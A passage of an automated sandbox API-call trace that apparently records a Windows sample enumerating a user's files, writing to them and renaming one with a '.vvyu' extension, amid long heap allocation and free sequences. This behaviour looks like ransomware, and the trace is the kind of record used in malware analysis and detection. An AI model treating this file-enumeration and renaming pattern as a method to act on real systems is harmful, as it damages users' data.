lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0189.040] CloseHandle (hObject=0x584) returned 1 [0189.041] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea898 [0189.041] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x880) returned 0x2d42908 [0189.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea898 | out: hHeap=0x6a0000) returned 1 [0189.041] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\links\\web slice gallery.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\Links\\Web Slice Gallery.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\links\\web slice gallery.url.vvyu")) returned 1 [0189.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.043] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.043] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0189.046] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ef07f70, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0 [0189.046] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0189.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0189.047] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b10 | out: hHeap=0x6a0000) returned 1 [0189.047] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0189.047] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0189.047] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0189.047] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.047] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.047] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.048] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.048] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.048] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.048] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.050] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.050] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.050] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0189.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0189.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0189.053] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.053] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.053] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0189.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0189.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.055] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0189.055] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.057] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.057] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0189.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0189.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.059] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.059] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.059] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.059] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.061] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.061] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.061] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.064] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.064] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.064] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0189.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0189.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.066] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.066] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.066] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.066] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0189.066] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.066] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0189.067] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.067] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.067] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0189.067] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.068] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0189.068] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.068] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.070] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.070] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.070] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.070] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.070] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0189.070] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.071] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0189.071] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.071] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.071] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0189.071] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.072] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.072] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0189.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.073] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.073] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.073] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.074] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.074] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.075] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.075] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.075] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0189.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0189.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0189.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0189.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.081] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.081] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.081] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0189.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0189.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0189.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0189.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.085] HeapFree (in: 